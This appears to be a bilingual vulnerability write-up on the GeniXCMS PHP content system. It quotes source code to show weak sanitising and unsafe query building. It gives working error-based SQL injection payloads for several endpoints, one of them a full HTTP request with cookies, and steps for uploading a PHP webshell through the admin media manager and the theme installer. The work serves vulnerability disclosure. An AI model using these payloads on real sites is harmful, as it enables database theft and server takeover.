看到松阔拿到了cve,于是我也想去审计尝试一下,都是一些超级简单的洞。
I found some unsafe method to cause a lot of problems.
I hope this helps you.
method issue
Can see this in Db.class.php, You can see that escape is safe.
It is used in insert/update etc. But it is not used in select.
public static function escape($vars)
{
if (DB_DRIVER == 'mysql') {
$vars = mysql_escape_string($vars);
This program will generally use Typo::cleanX
to deal with $_POST\$_GET
public static function cleanX($c)
{
$val = self::strip_tags_content($c, '<script>', true);
$val = htmlspecialchars(
$val,
ENT_QUOTES | ENT_HTML5,
'utf-8'
);
return $val;
}
It encodes the HTML character, But \
is not processed. So I can use \
to inject
issue1
public static function exist($tag)
{
$tag = Typo::cleanX($tag);
$sql = "SELECT `name` FROM `cat` WHERE `name` = '{$tag}' OR `slug` = '{$tag}' AND `type` = 'tag'";
$q = Db::result($sql);
// echo Db::$num_rows;
if (Db::$num_rows > 0) {
return true;
} else {
return false;
}
}
if $tag
= and updatexml(1,(select version()),1)#\
SELECT `name` FROM `cat` WHERE `name` = 'and updatexml(1,(select version()),1)#\' OR `slug` = 'and updatexml(1,(select version()),1)#\' AND `type` = 'tag'
it look like this:
SELECT `name` FROM `cat` WHERE `name` = 'xx' and updatexml(1,(select version()),1);
issue2
public static function insert($vars)
{
if (is_array($vars)) {
$set = '';
$k = '';
foreach ($vars['key'] as $key => $val) {
$val = self::escape($val);
$set .= "'{$val}',";
$k .= "`{$key}`,";
}
$set = substr($set, 0, -1);
$k = substr($k, 0, -1);
$sql = sprintf('INSERT INTO `%s` (%s) VALUES (%s) ', $vars['table'], $k, $set);
} else {
$sql = $vars;
}
if (DB_DRIVER == 'mysql') {
mysql_query('SET CHARACTER SET utf8');
$q = mysql_query($sql) or die(mysql_error());
self::$last_id = mysql_insert_id();
here :
if (is_array($vars)) {
} else {
$sql = $vars;
}
when $vars
not is an array. This will cause security problems. Because $val = self::escape($val);
cann't to exec.
Example:
/inc/lib/Control/Backend/categories.control.php
if (User::access(1)) {
$data['sitetitle'] = CATEGORIES;
switch (isset($_POST['addcat'])) {
case true:
// cleanup first
$slug = Typo::slugify(Typo::cleanX($_POST['cat']));
$cat = Typo::cleanX($_POST['cat']);
if (!isset($_POST['token']) || !Token::isExist($_POST['token'])) {
// VALIDATE ALL
$alertDanger[] = TOKEN_NOT_EXIST;
}
if (!isset($_POST['cat']) || $_POST['cat'] == '') {
$alertDanger[] = CATEGORY_CANNOT_EMPTY;
}
if (isset($alertDanger)) {
$data['alertDanger'] = $alertDanger;
} else {
$cat = Db::insert(
sprintf(
"INSERT INTO `cat` VALUES (null, '%s', '%s', '%d', '', 'post' )",
$cat,
$slug,
Typo::int($_POST['parent'])
)
);
//print_r($cat);
$data['alertSuccess'][] = MSG_CATEGORY_ADDED.' '.$_POST['cat'];
}
if (isset($_POST['token'])) {
Token::remove($_POST['token']);
}
break;
default:
break;
}
here have safe issue:
$cat = Db::insert(
sprintf(
"INSERT INTO `cat` VALUES (null, '%s', '%s', '%d', '', 'post' )",
$cat,
$slug,
Typo::int($_POST['parent'])
)
);
Of course, update also has this problem.
[sql injection]
issue1:
/inc/lib/Control/Backend/posts.control.php
$data['post'] = Db::result("SELECT * FROM `posts` WHERE `id` = '{$_GET['id']}' ");
exp1:
http://lemon.love/code-src/GeniXCMS/GeniXCMS-master/gxadmin/index.php?page=posts&act=edit&id=6' and updatexml(1,(select user()),1)%23&token=Pp52R3oD4wuLBVutgD9hMsMrp8alQD3bKmuf06AI0HZMzoMiRe3s18BUa4eIOqrMqj38Cp9aoQqWaw10
issue2:
/inc/mod/newsletter/options.php
$usr = Db::result("SELECT * FROM `user` WHERE `group` = '{$_POST['recipient']}'");
exp2:
POST /code-src/GeniXCMS/GeniXCMS-master/gxadmin/index.php?page=mods&mod=newsletter HTTP/1.1 Host: lemon.love User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:50.0) Gecko/20100101 Firefox/50.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://lemon.love/code-src/GeniXCMS/GeniXCMS-master/gxadmin/index.php?page=mods&mod=newsletter Cookie: GeniXCMS-I3YZLgqlM9CM33Zi6PBF=f0d4ea594sg6i85ovsgeeg4um1; USER_NAME_COOKIE=admin; SID_1=95aefa9c; GeniXCMS-I3YZLgqlM9CM33Zi6PBF=f0d4ea594sg6i85ovsgeeg4um1; GeniXCMS-Installation=bscpujchn91pl57oj10af4vb45; GeniXCMS-vMIHkJPDSgZrrg3uywYO=48a5t0i0d7bqh4q3toepkckf37 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 193 subject=aaa%40qq.com&recipient=a'+and+updatexml(1,(select+version()),1)%23&type=text&token=x972PTSsrW9U5tCdFGTuRpgsNewA0Ozm3UTaPsh9ixhA3R0O25cRE7FCK3xlyEttm4EUGJXfgb3cCs3H&sendmail=&message=aaa
后台getshell
1、windows
多媒体中上传1.php.
,即可shell
2、通用
theme安装:上传zip文件
\inc\themes\shell\1\1.php